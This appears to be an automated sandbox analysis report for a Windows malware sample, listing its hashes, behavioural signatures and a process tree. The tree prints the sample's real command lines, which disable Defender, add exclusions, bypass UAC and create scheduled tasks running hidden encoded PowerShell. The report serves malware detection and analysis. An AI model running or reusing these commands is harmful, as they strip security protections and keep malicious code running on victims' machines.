Analysis
-
max time kernel
21s -
max time network
159s -
platform
windows10-2004_x64 -
resource
win10v2004-20231023-en -
resource tags
arch:x64arch:x86image:win10v2004-20231023-enlocale:en-usos:windows10-2004-x64system -
submitted
19-11-2023 21:49
Static task
static1
Behavioral task
behavioral1
Sample
f36fc8e0bb8eab645cf6b4876e588dc427575a4fb25db629598b29f1d9328756.exe
Resource
win7-20231023-en
General
-
Target
f36fc8e0bb8eab645cf6b4876e588dc427575a4fb25db629598b29f1d9328756.exe
-
Size
231KB
-
MD5
238ef24a5847077daa2bb119b43a1a76
-
SHA1
c9ad623744aea9196c90cb7b31408b20916d7b89
-
SHA256
f36fc8e0bb8eab645cf6b4876e588dc427575a4fb25db629598b29f1d9328756
-
SHA512
6b2ec5c4c8816c711e2cfee85ea929ebb6771e0448be24256022a31cade8535345a4650084411b0f939d05e55e7fb7a781c525a2e205c9bca8b66bdf23f70539
-
SSDEEP
6144:58n+yOLNc4zZSvbH/44PtYNaBBeVJR8uCxA5axHU:2nPOpSvD/X+pJR8uRD
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" forfiles.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths f36fc8e0bb8eab645cf6b4876e588dc427575a4fb25db629598b29f1d9328756.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\f36fc8e0bb8eab645cf6b4876e588dc427575a4fb25db629598b29f1d9328756.exe = "0" f36fc8e0bb8eab645cf6b4876e588dc427575a4fb25db629598b29f1d9328756.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Drops startup file 6 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\S3s8QVkYmmarHKtMASZAZ9rF.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sX6JHbQ8bdhtTp5PdfpZ7Mx9.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\T5BlQCcHmcLdFZ2zD9P0vIzo.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tsWDsYHwMugtdrZYZWLV2BCH.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3dFXATRSj8GALZibgtbAnfKv.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AFCfJlXFXeSu1HYvDNmWDz67.bat CasPol.exe -
Executes dropped EXE 12 IoCs
pid Process 4296 UFgh6gQFjxezwkLuXW6vhMcD.exe 2876 UCiFD62PAihRsIPhdrabhizx.exe 3452 nv1mES58NibHPEcrQeBtzUL2.exe 3984 Broom.exe 1952 oCOglTlWTgfuGMPs6eg5rtcN.exe 4032 9EYgzJrYTTk3ZAdTU2FZymv1.exe 1140 oCOglTlWTgfuGMPs6eg5rtcN.exe 3548 oCOglTlWTgfuGMPs6eg5rtcN.exe 4792 oCOglTlWTgfuGMPs6eg5rtcN.exe 4952 Install.exe 4580 oCOglTlWTgfuGMPs6eg5rtcN.exe 3696 Install.exe -
Loads dropped DLL 5 IoCs
pid Process 1952 oCOglTlWTgfuGMPs6eg5rtcN.exe 1140 oCOglTlWTgfuGMPs6eg5rtcN.exe 3548 oCOglTlWTgfuGMPs6eg5rtcN.exe 4792 oCOglTlWTgfuGMPs6eg5rtcN.exe 4580 oCOglTlWTgfuGMPs6eg5rtcN.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x0006000000022d91-98.dat upx behavioral2/memory/1952-101-0x00000000008B0000-0x0000000000DD9000-memory.dmp upx behavioral2/files/0x0006000000022d91-84.dat upx behavioral2/files/0x0006000000022d91-109.dat upx behavioral2/memory/1140-118-0x00000000008B0000-0x0000000000DD9000-memory.dmp upx behavioral2/files/0x0006000000022da4-120.dat upx behavioral2/memory/3548-122-0x00000000009B0000-0x0000000000ED9000-memory.dmp upx behavioral2/files/0x0006000000022d91-116.dat upx behavioral2/memory/3548-126-0x00000000009B0000-0x0000000000ED9000-memory.dmp upx behavioral2/files/0x0006000000022d91-130.dat upx behavioral2/memory/4792-135-0x00000000008B0000-0x0000000000DD9000-memory.dmp upx behavioral2/files/0x0006000000022d91-139.dat upx behavioral2/memory/4580-143-0x00000000008B0000-0x0000000000DD9000-memory.dmp upx behavioral2/memory/1952-200-0x00000000008B0000-0x0000000000DD9000-memory.dmp upx behavioral2/memory/4792-202-0x00000000008B0000-0x0000000000DD9000-memory.dmp upx behavioral2/memory/4580-203-0x00000000008B0000-0x0000000000DD9000-memory.dmp upx -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions f36fc8e0bb8eab645cf6b4876e588dc427575a4fb25db629598b29f1d9328756.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\f36fc8e0bb8eab645cf6b4876e588dc427575a4fb25db629598b29f1d9328756.exe = "0" f36fc8e0bb8eab645cf6b4876e588dc427575a4fb25db629598b29f1d9328756.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths f36fc8e0bb8eab645cf6b4876e588dc427575a4fb25db629598b29f1d9328756.exe -
Enumerates connected drives 3 TTPs 4 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\D: oCOglTlWTgfuGMPs6eg5rtcN.exe File opened (read-only) \??\F: oCOglTlWTgfuGMPs6eg5rtcN.exe File opened (read-only) \??\D: oCOglTlWTgfuGMPs6eg5rtcN.exe File opened (read-only) \??\F: oCOglTlWTgfuGMPs6eg5rtcN.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2312 set thread context of 4200 2312 forfiles.exe 87 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2476 schtasks.exe 3976 schtasks.exe 4392 schtasks.exe 3988 schtasks.exe 4648 schtasks.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4684 powershell.exe 4684 reg.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4200 CasPol.exe Token: SeDebugPrivilege 4684 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3984 Broom.exe -
Suspicious use of WriteProcessMemory 47 IoCs
description pid Process procid_target PID 2312 wrote to memory of 4684 2312 forfiles.exe 84 PID 2312 wrote to memory of 4684 2312 forfiles.exe 84 PID 2312 wrote to memory of 4684 2312 forfiles.exe 84 PID 2312 wrote to memory of 4200 2312 forfiles.exe 87 PID 2312 wrote to memory of 4200 2312 forfiles.exe 87 PID 2312 wrote to memory of 4200 2312 forfiles.exe 87 PID 2312 wrote to memory of 4200 2312 forfiles.exe 87 PID 2312 wrote to memory of 4200 2312 forfiles.exe 87 PID 2312 wrote to memory of 4200 2312 forfiles.exe 87 PID 2312 wrote to memory of 4200 2312 forfiles.exe 87 PID 2312 wrote to memory of 4200 2312 forfiles.exe 87 PID 4200 wrote to memory of 4296 4200 CasPol.exe 88 PID 4200 wrote to memory of 4296 4200 CasPol.exe 88 PID 4200 wrote to memory of 4296 4200 CasPol.exe 88 PID 4200 wrote to memory of 2876 4200 CasPol.exe 89 PID 4200 wrote to memory of 2876 4200 CasPol.exe 89 PID 4200 wrote to memory of 2876 4200 CasPol.exe 89 PID 4200 wrote to memory of 3452 4200 CasPol.exe 90 PID 4200 wrote to memory of 3452 4200 CasPol.exe 90 PID 4200 wrote to memory of 3452 4200 CasPol.exe 90 PID 2876 wrote to memory of 3984 2876 UCiFD62PAihRsIPhdrabhizx.exe 91 PID 2876 wrote to memory of 3984 2876 UCiFD62PAihRsIPhdrabhizx.exe 91 PID 2876 wrote to memory of 3984 2876 UCiFD62PAihRsIPhdrabhizx.exe 91 PID 4200 wrote to memory of 1952 4200 CasPol.exe 92 PID 4200 wrote to memory of 1952 4200 CasPol.exe 92 PID 4200 wrote to memory of 1952 4200 CasPol.exe 92 PID 4200 wrote to memory of 4032 4200 CasPol.exe 93 PID 4200 wrote to memory of 4032 4200 CasPol.exe 93 PID 4200 wrote to memory of 4032 4200 CasPol.exe 93 PID 1952 wrote to memory of 1140 1952 oCOglTlWTgfuGMPs6eg5rtcN.exe 94 PID 1952 wrote to memory of 1140 1952 oCOglTlWTgfuGMPs6eg5rtcN.exe 94 PID 1952 wrote to memory of 1140 1952 oCOglTlWTgfuGMPs6eg5rtcN.exe 94 PID 1952 wrote to memory of 3548 1952 oCOglTlWTgfuGMPs6eg5rtcN.exe 95 PID 1952 wrote to memory of 3548 1952 oCOglTlWTgfuGMPs6eg5rtcN.exe 95 PID 1952 wrote to memory of 3548 1952 oCOglTlWTgfuGMPs6eg5rtcN.exe 95 PID 1952 wrote to memory of 4792 1952 oCOglTlWTgfuGMPs6eg5rtcN.exe 97 PID 1952 wrote to memory of 4792 1952 oCOglTlWTgfuGMPs6eg5rtcN.exe 97 PID 1952 wrote to memory of 4792 1952 oCOglTlWTgfuGMPs6eg5rtcN.exe 97 PID 4032 wrote to memory of 4952 4032 9EYgzJrYTTk3ZAdTU2FZymv1.exe 96 PID 4032 wrote to memory of 4952 4032 9EYgzJrYTTk3ZAdTU2FZymv1.exe 96 PID 4032 wrote to memory of 4952 4032 9EYgzJrYTTk3ZAdTU2FZymv1.exe 96 PID 4792 wrote to memory of 4580 4792 oCOglTlWTgfuGMPs6eg5rtcN.exe 98 PID 4792 wrote to memory of 4580 4792 oCOglTlWTgfuGMPs6eg5rtcN.exe 98 PID 4792 wrote to memory of 4580 4792 oCOglTlWTgfuGMPs6eg5rtcN.exe 98 PID 4952 wrote to memory of 3696 4952 Install.exe 99 PID 4952 wrote to memory of 3696 4952 Install.exe 99 PID 4952 wrote to memory of 3696 4952 Install.exe 99
Processes
-
C:\Users\Admin\AppData\Local\Temp\f36fc8e0bb8eab645cf6b4876e588dc427575a4fb25db629598b29f1d9328756.exe"C:\Users\Admin\AppData\Local\Temp\f36fc8e0bb8eab645cf6b4876e588dc427575a4fb25db629598b29f1d9328756.exe"1⤵
- Windows security bypass
- Windows security modification
PID:2312 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\f36fc8e0bb8eab645cf6b4876e588dc427575a4fb25db629598b29f1d9328756.exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4684
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"2⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4200 -
C:\Users\Admin\Pictures\UFgh6gQFjxezwkLuXW6vhMcD.exe"C:\Users\Admin\Pictures\UFgh6gQFjxezwkLuXW6vhMcD.exe"3⤵
- Executes dropped EXE
PID:4296
-
-
C:\Users\Admin\Pictures\UCiFD62PAihRsIPhdrabhizx.exe"C:\Users\Admin\Pictures\UCiFD62PAihRsIPhdrabhizx.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2876 -
C:\Users\Admin\AppData\Local\Temp\Broom.exeC:\Users\Admin\AppData\Local\Temp\Broom.exe4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3984
-
-
-
C:\Users\Admin\Pictures\nv1mES58NibHPEcrQeBtzUL2.exe"C:\Users\Admin\Pictures\nv1mES58NibHPEcrQeBtzUL2.exe"3⤵
- Executes dropped EXE
PID:3452
-
-
C:\Users\Admin\Pictures\oCOglTlWTgfuGMPs6eg5rtcN.exe"C:\Users\Admin\Pictures\oCOglTlWTgfuGMPs6eg5rtcN.exe" --silent --allusers=03⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
PID:1952 -
C:\Users\Admin\Pictures\oCOglTlWTgfuGMPs6eg5rtcN.exeC:\Users\Admin\Pictures\oCOglTlWTgfuGMPs6eg5rtcN.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=105.0.4970.16 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2c0,0x2f0,0x6ef774f0,0x6ef77500,0x6ef7750c4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1140
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\oCOglTlWTgfuGMPs6eg5rtcN.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\oCOglTlWTgfuGMPs6eg5rtcN.exe" --version4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3548
-
-
C:\Users\Admin\Pictures\oCOglTlWTgfuGMPs6eg5rtcN.exe"C:\Users\Admin\Pictures\oCOglTlWTgfuGMPs6eg5rtcN.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=1952 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20231119215000" --session-guid=635616cf-5793-4a09-9f1f-9b67859f8568 --server-tracking-blob=NWY4ODE0ODUyMWY5Zjk2MThiNWY2YTg3MGIwYTMzNzIxMGJkZTE4ZGZiYTg5ZWM4ZDc0NWQ0YmZhYjNjYzAxMzp7ImNvdW50cnkiOiJOTCIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcwMDQzMDU5NS4wMTM1IiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiJhYTA5YjlhMi04MmYxLTQwMTgtYWI1ZC01ZmQ1N2FiMGZlMDIifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=EC040000000000004⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
PID:4792 -
C:\Users\Admin\Pictures\oCOglTlWTgfuGMPs6eg5rtcN.exeC:\Users\Admin\Pictures\oCOglTlWTgfuGMPs6eg5rtcN.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=105.0.4970.16 --initial-client-data=0x2e0,0x2f0,0x2f4,0x2bc,0x2f8,0x6db874f0,0x6db87500,0x6db8750c5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4580
-
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311192150001\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311192150001\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe"4⤵PID:988
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311192150001\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311192150001\assistant\assistant_installer.exe" --version4⤵PID:4724
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311192150001\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311192150001\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.25 --initial-client-data=0x268,0x26c,0x270,0x244,0x274,0x671588,0x671598,0x6715a45⤵PID:640
-
-
-
-
C:\Users\Admin\Pictures\9EYgzJrYTTk3ZAdTU2FZymv1.exe"C:\Users\Admin\Pictures\9EYgzJrYTTk3ZAdTU2FZymv1.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4032 -
C:\Users\Admin\AppData\Local\Temp\7zS3563.tmp\Install.exe.\Install.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4952 -
C:\Users\Admin\AppData\Local\Temp\7zS45ED.tmp\Install.exe.\Install.exe /Ojdidxev "385118" /S5⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
PID:3696 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"6⤵
- UAC bypass
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2312 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&7⤵PID:468
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:328⤵PID:3280
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:648⤵PID:4860
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"6⤵PID:548
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&7⤵PID:3928
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:328⤵PID:2140
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:648⤵PID:2636
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gpPwlBMDc" /SC once /ST 20:09:40 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="6⤵
- Creates scheduled task(s)
PID:2476
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gpPwlBMDc"6⤵PID:4068
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gpPwlBMDc"6⤵PID:5008
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bFvsKFifcttmubYYTU" /SC once /ST 21:51:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\YmqzWwwqxJQdhSTVN\PfzJEsvfSkvLAaT\mhdkOUY.exe\" 1c /YUsite_idmOd 385118 /S" /V1 /F6⤵
- Creates scheduled task(s)
PID:3976
-
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:1720
-
C:\Users\Admin\AppData\Local\Temp\YmqzWwwqxJQdhSTVN\PfzJEsvfSkvLAaT\mhdkOUY.exeC:\Users\Admin\AppData\Local\Temp\YmqzWwwqxJQdhSTVN\PfzJEsvfSkvLAaT\mhdkOUY.exe 1c /YUsite_idmOd 385118 /S1⤵PID:1012
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵PID:2936
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:4436
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:724
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:1912
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:2976
-
-
